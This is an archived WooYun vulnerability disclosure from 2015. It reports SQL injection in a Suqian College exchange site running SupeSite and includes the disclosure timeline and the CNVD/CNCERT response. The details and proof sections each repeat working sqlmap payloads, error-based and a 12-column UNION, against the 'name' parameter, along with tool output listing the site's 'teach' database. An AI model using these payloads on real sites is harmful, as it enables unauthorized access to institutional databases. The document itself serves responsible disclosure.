Vulnerability summary

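Bug ID: wooyun-2015-0133131

Title: SQL injection in the Suqian College (宿迁学院) exchange site

Vendor: Suqian College (宿迁学院)

Author: 路人甲

Submitted: 2015-08-12 17:22

Fixed: 2015-09-27 15:30

Published: 2015-09-27 15:30

Vulnerability type: SQL injection

Severity: Low

Self-assessed rank: 5

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]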


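Vulnerability details

Disclosure status:

2015-08-12: Details reported to the vendor; awaiting vendor handling
2015-08-13: CNCERT has not yet been able to reach the organization concerned; details disclosed only to the notifying agencies
2015-08-23: Details disclosed to core white hats and experts in related fields
2015-09-02: Details disclosed to regular white hats
2015-09-12: Details disclosed to intern white hats
2015-09-27: Details disclosed to the public

Brief description:

Detailed description: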

http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments%20where%201=2
SupeSite injection

Place: GET
Parameter: name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x7170697071,(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 0 END)),0x7177656571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tgVB
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: action=modelquote&cid=1&name=spacecomments where 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170697071,0x6543795173576a5a516f,0x7177656571),NULL,NULL,NULL,NULL,NULL,NULL#
---
[08:26:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[08:26:00] [INFO] fetching tables for database: 'teach'
[08:26:04] [WARNING] reflective value(s) found and filtering out
[08:26:04] [WARNING] the SQL query provided does not return any output
[08:26:04] [INFO] the SQL query used returns 210 entries
Database: teach
[199 tables]

Proof of vulnerability:

Place: GET
Parameter: name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=modelquote&cid=1&name=spacecomments where 1=2 AND (SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x7170697071,(SELECT (CASE WHEN (8709=8709) THEN 1 ELSE 0 END)),0x7177656571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- tgVB
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: action=modelquote&cid=1&name=spacecomments where 1=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170697071,0x6543795173576a5a516f,0x7177656571),NULL,NULL,NULL,NULL,NULL,NULL#
---
[08:26:00] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
[08:26:00] [INFO] fetching tables for database: 'teach'
[08:26:04] [WARNING] reflective value(s) found and filtering out
[08:26:04] [WARNING] the SQL query provided does not return any output
[08:26:04] [INFO] the SQL query used returns 210 entries
Database: teach
[199 tables]

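Fix:

Update

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-08-13 15:28

Vendor reply:

CNVD has confirmed the situation described and has passed it through CNCERT to the Jiangsu branch center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None yet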